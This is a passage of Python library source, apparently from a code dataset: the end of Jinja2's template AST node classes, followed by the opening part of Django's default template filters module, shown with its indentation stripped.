while todo:
node = todo.popleft()
node.environment = environment
todo.extend(node.iter_child_nodes())
return self
def __eq__(self, other):
return type(self) is type(other) and \
tuple(self.iter_fields()) == tuple(other.iter_fields())
def __ne__(self, other):
return not self.__eq__(other)
# Restore Python 2 hashing behavior on Python 3
__hash__ = object.__hash__
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
arg in self.fields)
)
class Stmt(Node):
"""Base node for all statements."""
abstract = True
class Helper(Node):
"""Nodes that exist in a specific context only."""
abstract = True
class Template(Node):
"""Node that represents a template. This must be the outermost node that
is passed to the compiler.
"""
fields = ('body',)
class Output(Stmt):
"""A node that holds multiple expressions which are then printed out.
This is used both for the `print` statement and the regular template data.
"""
fields = ('nodes',)
class Extends(Stmt):
"""Represents an extends statement."""
fields = ('template',)
class For(Stmt):
"""The for loop. `target` is the target for the iteration (usually a
:class:`Name` or :class:`Tuple`), `iter` the iterable. `body` is a list
of nodes that are used as loop-body, and `else_` a list of nodes for the
`else` block. If no else node exists it has to be an empty list.
For filtered nodes an expression can be stored as `test`, otherwise `None`.
"""
fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')
class If(Stmt):
"""If `test` is true, `body` is rendered, else `else_`."""
fields = ('test', 'body', 'else_')
class Macro(Stmt):
"""A macro definition. `name` is the name of the macro, `args` a list of
arguments and `defaults` a list of defaults if there are any. `body` is
a list of nodes for the macro body.
"""
fields = ('name', 'args', 'defaults', 'body')
class CallBlock(Stmt):
"""Like a macro without a name but a call instead. `call` is called with
the unnamed macro as `caller` argument this node holds.
"""
fields = ('call', 'args', 'defaults', 'body')
class FilterBlock(Stmt):
"""Node for filter sections."""
fields = ('body', 'filter')
class Block(Stmt):
"""A node that represents a block."""
fields = ('name', 'body', 'scoped')
class Include(Stmt):
"""A node that represents the include tag."""
fields = ('template', 'with_context', 'ignore_missing')
class Import(Stmt):
"""A node that represents the import tag."""
fields = ('template', 'target', 'with_context')
class FromImport(Stmt):
"""A node that represents the from import tag. It's important to not
pass unsafe names to the name attribute. The compiler translates the
attribute lookups directly into getattr calls and does *not* use the
subscript callback of the interface. As exported variables may not
start with double underscores (which the parser asserts) this is not a
problem for regular Jinja code, but if this node is used in an extension
extra care must be taken.
The list of names may contain tuples if aliases are wanted.
"""
fields = ('template', 'names', 'with_context')
class ExprStmt(Stmt):
"""A statement that evaluates an expression and discards the result."""
fields = ('node',)
class Assign(Stmt):
"""Assigns an expression to a target."""
fields = ('target', 'node')
class Expr(Node):
"""Baseclass for all expressions."""
abstract = True
def as_const(self, eval_ctx=None):
"""Return the value of the expression as constant or raise
:exc:`Impossible` if this was not possible.
An :class:`EvalContext` can be provided, if none is given
a default context is created which requires the nodes to have
an attached environment.
.. versionchanged:: 2.4
the `eval_ctx` parameter was added.
"""
raise Impossible()
def can_assign(self):
"""Check if it's possible to assign something to this node."""
return False
class BinExpr(Expr):
"""Baseclass for all binary expressions."""
fields = ('left', 'right')
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_binops:
raise Impossible()
f = _binop_to_func[self.operator]
try:
return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
except Exception:
raise Impossible()
class UnaryExpr(Expr):
"""Baseclass for all unary expressions."""
fields = ('node',)
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
# intercepted operators cannot be folded at compile time
if self.environment.sandboxed and \
self.operator in self.environment.intercepted_unops:
raise Impossible()
f = _uaop_to_func[self.operator]
try:
return f(self.node.as_const(eval_ctx))
except Exception:
raise Impossible()
class Name(Expr):
"""Looks up a name or stores a value in a name.
The `ctx` of the node can be one of the following values:
- `store`: store a value in the name
- `load`: load that name
- `param`: like `store` but if the name was defined as function parameter.
"""
fields = ('name', 'ctx')
def can_assign(self):
return self.name not in ('true', 'false', 'none',
'True', 'False', 'None')
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
representation (objects where ``eval(repr(x)) == x`` is true).
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from .compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
if eval_ctx.autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
"""For loop unpacking and some other things like multiple arguments
for subscripts. Like for :class:`Name` `ctx` specifies if the tuple
is used for loading the names or storing.
"""
fields = ('items', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return tuple(x.as_const(eval_ctx) for x in self.items)
def can_assign(self):
for item in self.items:
if not item.can_assign():
return False
return True
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
"""A conditional expression (inline if expression). (``{{
foo if bar else baz }}``)
"""
fields = ('test', 'expr1', 'expr2')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.test.as_const(eval_ctx):
return self.expr1.as_const(eval_ctx)
# if we evaluate to an undefined object, we better do that at runtime
if self.expr2 is None:
raise Impossible()
return self.expr2.as_const(eval_ctx)
class Filter(Expr):
"""This node applies a filter on an expression. `name` is the name of
the filter, the rest of the fields are the same as for :class:`Call`.
If the `node` of a filter is `None` the contents of the last buffer are
filtered. Buffers are created by macros and filter blocks.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile or self.node is None:
raise Impossible()
# we have to be careful here because we call filter_ below.
# if this variable would be called filter, 2to3 would wrap the
# call in a list beause it is assuming we are talking about the
# builtin filter function here which no longer returns a list in
# python 3. because of that, do not rename filter_ to filter!
filter_ = self.environment.filters.get(self.name)
if filter_ is None or getattr(filter_, 'contextfilter', False):
raise Impossible()
obj = self.node.as_const(eval_ctx)
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(filter_, 'evalcontextfilter', False):
args.insert(0, eval_ctx)
elif getattr(filter_, 'environmentfilter', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return filter_(obj, *args, **kwargs)
except Exception:
raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
"""Calls an expression. `args` is a list of arguments, `kwargs` a list
of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
and `dyn_kwargs` has to be either `None` or a node that is used as
node for dynamic positional (``*args``) or keyword (``**kwargs``)
arguments.
"""
fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
obj = self.node.as_const(eval_ctx)
# don't evaluate context functions
args = [x.as_const(eval_ctx) for x in self.args]
if isinstance(obj, _context_function_types):
if getattr(obj, 'contextfunction', False):
raise Impossible()
elif getattr(obj, 'evalcontextfunction', False):
args.insert(0, eval_ctx)
elif getattr(obj, 'environmentfunction', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return obj(*args, **kwargs)
except Exception:
raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except Exception:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
"""Get an attribute or item from an expression that is a ascii-only
bytestring and prefer the attribute.
"""
fields = ('node', 'attr', 'ctx')
def as_const(self, eval_ctx=None):
if self.ctx != 'load':
raise Impossible()
try:
eval_ctx = get_eval_context(self, eval_ctx)
return self.environment.getattr(self.node.as_const(eval_ctx),
self.attr)
except Exception:
raise Impossible()
def can_assign(self):
return False
class Slice(Expr):
"""Represents a slice object. This must only be used as argument for
:class:`Subscript`.
"""
fields = ('start', 'stop', 'step')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
def const(obj):
if obj is None:
return None
return obj.as_const(eval_ctx)
return slice(const(self.start), const(self.stop), const(self.step))
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(text_type(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
"""Compares an expression with some other expressions. `ops` must be a
list of :class:`Operand`\s.
"""
fields = ('expr', 'ops')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
result = value = self.expr.as_const(eval_ctx)
try:
for op in self.ops:
new_value = op.expr.as_const(eval_ctx)
result = _cmpop_to_func[op.op](value, new_value)
value = new_value
except Exception:
raise Impossible()
return result
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
"""Divides the left by the right node and truncates conver the
result into an integer by truncating.
"""
operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
template and is not threated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class MarkSafeIfAutoescape(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`) but
only if autoescaping is active.
.. versionadded:: 2.5
"""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
expr = self.expr.as_const(eval_ctx)
if eval_ctx.autoescape:
return Markup(expr)
return expr
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new); del _failing_new
| apache-2.0 |
gminds/rapidnewsng | django/template/defaultfilters.py | 105 | 28133 | """Default variable filters."""
from __future__ import unicode_literals
import re
import random as random_module
import unicodedata
from decimal import Decimal, InvalidOperation, Context, ROUND_HALF_UP
from functools import wraps
from pprint import pformat
from django.template.base import Variable, Library, VariableDoesNotExist
from django.conf import settings
from django.utils import formats
from django.utils.dateformat import format, time_format
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import (conditional_escape, escapejs, fix_ampersands,
escape, urlize as urlize_impl, linebreaks, strip_tags)
from django.utils.http import urlquote
from django.utils.text import Truncator, wrap, phone2numeric
from django.utils.safestring import mark_safe, SafeData, mark_for_escaping
from django.utils import six
from django.utils.timesince import timesince, timeuntil
from django.utils.translation import ugettext, ungettext
from django.utils.text import normalize_newlines
register = Library()
#######################
# STRING DECORATOR #
#######################
def stringfilter(func):
"""
Decorator for filters which should only receive unicode objects. The object
passed as the first positional argument will be converted to a unicode
object.
"""
def _dec(*args, **kwargs):
if args:
args = list(args)
args[0] = force_text(args[0])
if (isinstance(args[0], SafeData) and
getattr(_dec._decorated_function, 'is_safe', False)):
return mark_safe(func(*args, **kwargs))
return func(*args, **kwargs)
# Include a reference to the real function (used to check original
# arguments by the template parser, and to bear the 'is_safe' attribute
# when multiple decorators are applied).
_dec._decorated_function = getattr(func, '_decorated_function', func)
for attr in ('is_safe', 'needs_autoescape'):
if hasattr(func, attr):
import warnings
warnings.warn("Setting the %s attribute of a template filter "
"function is deprecated; use @register.filter(%s=%s) "
"instead" % (attr, attr, getattr(func, attr)),
DeprecationWarning)
setattr(_dec, attr, getattr(func, attr))
return wraps(func)(_dec)
###################
# STRINGS #
###################
@register.filter(is_safe=True)
@stringfilter
def addslashes(value):
"""
Adds slashes before quotes. Useful for escaping strings in CSV, for
example. Less useful for escaping JavaScript; use the ``escapejs``
filter instead.
"""
return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
@register.filter(is_safe=True)
@stringfilter
def capfirst(value):
"""Capitalizes the first character of the value."""
return value and value[0].upper() + value[1:]
@register.filter("escapejs")
@stringfilter
def escapejs_filter(value):
"""Hex encodes characters for use in JavaScript strings."""
return escapejs(value)
@register.filter("fix_ampersands", is_safe=True)
@stringfilter
def fix_ampersands_filter(value):
"""Replaces ampersands with ``&`` entities."""
return fix_ampersands(value)
# Values for testing floatformat input against infinity and NaN representations,
# which differ across platforms and Python versions. Some (i.e. old Windows
# ones) are not recognized by Decimal but we want to return them unchanged vs.
# returning an empty string as we do for completely invalid input. Note these
# need to be built up from values that are not inf/nan, since inf/nan values do
# not reload properly from .pyc files on Windows prior to some level of Python 2.5
# (see Python Issue757815 and Issue1080440).
pos_inf = 1e200 * 1e200
neg_inf = -1e200 * 1e200
nan = (1e200 * 1e200) // (1e200 * 1e200)
special_floats = [str(pos_inf), str(neg_inf), str(nan)]
@register.filter(is_safe=True)
def floatformat(text, arg=-1):
"""
Displays a float to a specified number of decimal places.
If called without an argument, it displays the floating point number with
one decimal place -- but only if there's a decimal place to be displayed:
* num1 = 34.23234
* num2 = 34.00000
* num3 = 34.26000
* {{ num1|floatformat }} displays "34.2"
* {{ num2|floatformat }} displays "34"
* {{ num3|floatformat }} displays "34.3"
If arg is positive, it will always display exactly arg number of decimal
places:
* {{ num1|floatformat:3 }} displays "34.232"
* {{ num2|floatformat:3 }} displays "34.000"
* {{ num3|floatformat:3 }} displays "34.260"
If arg is negative, it will display arg number of decimal places -- but
only if there are places to be displayed:
* {{ num1|floatformat:"-3" }} displays "34.232"
* {{ num2|floatformat:"-3" }} displays "34"
* {{ num3|floatformat:"-3" }} displays "34.260"
If the input float is infinity or NaN, the (platform-dependent) string
representation of that value will be displayed.
"""
try:
input_val = force_text(text)
d = Decimal(input_val)
except UnicodeEncodeError:
return ''
except InvalidOperation:
if input_val in special_floats:
return input_val
try:
d = Decimal(force_text(float(text)))
except (ValueError, InvalidOperation, TypeError, UnicodeEncodeError):
return ''
try:
p = int(arg)
except ValueError:
return input_val
try:
m = int(d) - d
except (ValueError, OverflowError, InvalidOperation):
return input_val
if not m and p < 0:
return mark_safe(formats.number_format('%d' % (int(d)), 0))
if p == 0:
exp = Decimal(1)
else:
exp = Decimal('1.0') / (Decimal(10) ** abs(p))
try:
# Set the precision high enough to avoid an exception, see #15789.
tupl = d.as_tuple()
units = len(tupl[1]) - tupl[2]
prec = abs(p) + units + 1
# Avoid conversion to scientific notation by accessing `sign`, `digits`
# and `exponent` from `Decimal.as_tuple()` directly.
sign, digits, exponent = d.quantize(exp, ROUND_HALF_UP,
Context(prec=prec)).as_tuple()
digits = [six.text_type(digit) for digit in reversed(digits)]
while len(digits) <= abs(exponent):
digits.append('0')
digits.insert(-exponent, '.')
if sign:
digits.append('-')
number = ''.join(reversed(digits))
return mark_safe(formats.number_format(number, abs(p)))
except InvalidOperation:
return input_val
@register.filter(is_safe=True)
@stringfilter
def iriencode(value):
"""Escapes an IRI value for use in a URL."""
return force_text(iri_to_uri(value))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linenumbers(value, autoescape=None):
"""Displays text with line numbers."""
lines = value.split('\n')
# Find the maximum width of the line count, for use with zero padding
# string format command
width = six.text_type(len(six.text_type(len(lines))))
if not autoescape or isinstance(value, SafeData):
for i, line in enumerate(lines):
lines[i] = ("%0" + width + "d. %s") % (i + 1, line)
else:
for i, line in enumerate(lines):
lines[i] = ("%0" + width + "d. %s") % (i + 1, escape(line))
return mark_safe('\n'.join(lines))
@register.filter(is_safe=True)
@stringfilter
def lower(value):
"""Converts a string into all lowercase."""
return value.lower()
@register.filter(is_safe=False)
@stringfilter
def make_list(value):
"""
Returns the value turned into a list.
For an integer, it's a list of digits.
For a string, it's a list of characters.
"""
return list(value)
@register.filter(is_safe=True)
@stringfilter
def slugify(value):
"""
Converts to lowercase, removes non-word characters (alphanumerics and
underscores) and converts spaces to hyphens. Also strips leading and
trailing whitespace.
"""
from django.utils.text import slugify
return slugify(value)
@register.filter(is_safe=True)
def stringformat(value, arg):
"""
Formats the variable according to the arg, a string formatting specifier.
This specifier uses Python string formating syntax, with the exception that
the leading "%" is dropped.
See http://docs.python.org/lib/typesseq-strings.html for documentation
of Python string formatting
"""
try:
return ("%" + six.text_type(arg)) % value
except (ValueError, TypeError):
return ""
@register.filter(is_safe=True)
@stringfilter
def title(value):
"""Converts a string into titlecase."""
t = re.sub("([a-z])'([A-Z])", lambda m: m.group(0).lower(), value.title())
return re.sub("\d([A-Z])", lambda m: m.group(0).lower(), t)
@register.filter(is_safe=True)
@stringfilter
def truncatechars(value, arg):
"""
Truncates a string after a certain number of characters.
Argument: Number of characters to truncate after.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).chars(length)
@register.filter(is_safe=True)
@stringfilter
def truncatewords(value, arg):
"""
Truncates a string after a certain number of words.
Argument: Number of words to truncate after.
Newlines within the string are removed.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).words(length, truncate=' ...')
@register.filter(is_safe=True)
@stringfilter
def truncatewords_html(value, arg):
"""
Truncates HTML after a certain number of words.
Argument: Number of words to truncate after.
Newlines in the HTML are preserved.
"""
try:
length = int(arg)
except ValueError: # invalid literal for int()
return value # Fail silently.
return Truncator(value).words(length, html=True, truncate=' ...')
@register.filter(is_safe=False)
@stringfilter
def upper(value):
"""Converts a string into all uppercase."""
return value.upper()
@register.filter(is_safe=False)
@stringfilter
def urlencode(value, safe=None):
"""
Escapes a value for use in a URL.
Takes an optional ``safe`` parameter used to determine the characters which
should not be escaped by Django's ``urlquote`` method. If not provided, the
default safe characters will be used (but an empty string can be provided
when *all* characters should be escaped).
"""
kwargs = {}
if safe is not None:
kwargs['safe'] = safe
return urlquote(value, **kwargs)
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlize(value, autoescape=None):
"""Converts URLs in plain text into clickable links."""
return mark_safe(urlize_impl(value, nofollow=True, autoescape=autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlizetrunc(value, limit, autoescape=None):
"""
Converts URLs into clickable links, truncating URLs to the given character
limit, and adding 'rel=nofollow' attribute to discourage spamming.
Argument: Length to truncate URLs to.
"""
return mark_safe(urlize_impl(value, trim_url_limit=int(limit), nofollow=True,
autoescape=autoescape))
@register.filter(is_safe=False)
@stringfilter
def wordcount(value):
"""Returns the number of words."""
return len(value.split())
@register.filter(is_safe=True)
@stringfilter
def wordwrap(value, arg):
"""
Wraps words at specified line length.
Argument: number of characters to wrap the text at.
"""
return wrap(value, int(arg))
@register.filter(is_safe=True)
@stringfilter
def ljust(value, arg):
"""
Left-aligns the value in a field of a given width.
Argument: field size.
"""
return value.ljust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def rjust(value, arg):
"""
Right-aligns the value in a field of a given width.
Argument: field size.
"""
return value.rjust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def center(value, arg):
"""Centers the value in a field of a given width."""
return value.center(int(arg))
@register.filter
@stringfilter
def cut(value, arg):
"""
Removes all values of arg from the given string.
"""
safe = isinstance(value, SafeData)
value = value.replace(arg, '')
if safe and arg != ';':
return mark_safe(value)
return value
###################
# HTML STRINGS #
###################
@register.filter("escape", is_safe=True)
@stringfilter
def escape_filter(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_for_escaping(value)
@register.filter(is_safe=True)
@stringfilter
def force_escape(value):
"""
Escapes a string's HTML. This returns a new string containing the escaped
characters (as opposed to "escape", which marks the content for later
possible escaping).
"""
return escape(value)
@register.filter("linebreaks", is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaks_filter(value, autoescape=None):
"""
Replaces line breaks in plain text with appropriate HTML; a single
newline becomes an HTML line break (``<br />``) and a new line
followed by a blank line becomes a paragraph break (``</p>``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
return mark_safe(linebreaks(value, autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaksbr(value, autoescape=None):
"""
Converts all newlines in a piece of plain text to HTML line breaks
(``<br />``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
value = normalize_newlines(value)
if autoescape:
value = escape(value)
return mark_safe(value.replace('\n', '<br />'))
@register.filter(is_safe=True)
@stringfilter
def safe(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_safe(value)
@register.filter(is_safe=True)
def safeseq(value):
"""
A "safe" filter for sequences. Marks each element in the sequence,
individually, as safe, after converting them to unicode. Returns a list
with the results.
"""
return [mark_safe(force_text(obj)) for obj in value]
@register.filter(is_safe=True)
@stringfilter
def removetags(value, tags):
"""Removes a space separated list of [X]HTML tags from the output."""
from django.utils.html import remove_tags
return remove_tags(value, tags)
@register.filter(is_safe=True)
@stringfilter
def striptags(value):
"""Strips all [X]HTML tags."""
return strip_tags(value)
###################
# LISTS #
###################
@register.filter(is_safe=False)
def dictsort(value, arg):
"""
Takes a list of dicts, returns that list sorted by the property given in
the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve)
except (TypeError, VariableDoesNotExist):
return ''
@register.filter(is_safe=False)
def dictsortreversed(value, arg):
"""
Takes a list of dicts, returns that list sorted in reverse order by the
property given in the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve, reverse=True)
except (TypeError, VariableDoesNotExist):
return ''
@register.filter(is_safe=False)
def first(value):
"""Returns the first item in a list."""
try:
return value[0]
except IndexError:
return ''
@register.filter(is_safe=True, needs_autoescape=True)
def join(value, arg, autoescape=None):
"""
Joins a list with a string, like Python's ``str.join(list)``.
"""
value = map(force_text, value)
if autoescape:
value = [conditional_escape(v) for v in value]
try:
data = conditional_escape(arg).join(value)
except AttributeError: # fail silently but nicely
return value
return mark_safe(data)
@register.filter(is_safe=True)
def last(value):
"Returns the last item in a list"
try:
return value[-1]
except IndexError:
return ''
@register.filter(is_safe=True)
def length(value):
"""Returns the length of the value - useful for lists."""
try:
return len(value)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=False)
def length_is(value, arg):
"""Returns a boolean of whether the value's length is the argument."""
try:
return len(value) == int(arg)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
def random(value):
"""Returns a random item from the list."""
return random_module.choice(value)
@register.filter("slice", is_safe=True)
def slice_filter(value, arg):
"""
Returns a slice of the list.
Uses the same syntax as Python's list slicing; see
http://diveintopython.org/native_data_types/lists.html#odbchelper.list.slice
for an introduction.
"""
try:
bits = []
for x in arg.split(':'):
if len(x) == 0:
bits.append(None)
else:
bits.append(int(x))
return value[slice(*bits)]
except (ValueError, TypeError):
return value # Fail silently.
@register.filter(is_safe=True, needs_autoescape=True)
def unordered_list(value, autoescape=None):
"""
Recursively takes a self-nested list and returns an HTML unordered list --
WITHOUT opening and closing <ul> tags.
The list is assumed to be in the proper format. For example, if ``var``
contains: ``['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]``,
then ``{{ var|unordered_list }}`` would return::
<li>States
<ul>
<li>Kansas
<ul>
<li>Lawrence</li>
<li>Topeka</li>
</ul>
</li>
<li>Illinois</li>
</ul>
</li>
"""
if autoescape:
escaper = conditional_escape
else:
escaper = lambda x: x
def convert_old_style_list(list_):
"""
Converts old style lists to the new easier to understand format.
The old list format looked like:
['Item 1', [['Item 1.1', []], ['Item 1.2', []]]
And it is converted to:
['Item 1', ['Item 1.1', 'Item 1.2]]
"""
if not isinstance(list_, (tuple, list)) or len(list_) != 2:
return list_, False
first_item, second_item = list_
if second_item == []:
return [first_item], True
try:
# see if second item is iterable
iter(second_item)
except TypeError:
return list_, False
old_style_list = True
new_second_item = []
for sublist in second_item:
item, old_style_list = convert_old_style_list(sublist)
if not old_style_list:
break
new_second_item.extend(item)
if old_style_list:
second_item = new_second_item
return [first_item, second_item], old_style_list
def _helper(list_, tabs=1):
indent = '\t' * tabs
output = []
list_length = len(list_)
i = 0
while i < list_length:
title = list_[i]
sublist = ''
sublist_item = None
if isinstance(title, (list, tuple)):
sublist_item = title
title = ''
elif i < list_length - 1:
next_item = list_[i+1]
if next_item and isinstance(next_item, (list, tuple)):
# The next item is a sub-list.
sublist_item = next_item
# We've processed the next item now too.
i += 1
if sublist_item:
sublist = _helper(sublist_item, tabs+1)
sublist = '\n%s<ul>\n%s\n%s</ul>\n%s' % (indent, sublist,
indent, indent)
output.append('%s<li>%s%s</li>' % (indent,
escaper(force_text(title)), sublist))
i += 1
return '\n'.join(output)
value, converted = convert_old_style_list(value)
return mark_safe(_helper(value))
###################
# INTEGERS #
###################
@register.filter(is_safe=False)
def add(value, arg):
"""Adds the arg to the value."""
try:
return int(value) + int(arg)
except (ValueError, TypeError):
try:
return value + arg
except Exception:
return ''
@register.filter(is_safe=False)
def get_digit(value, arg):
"""
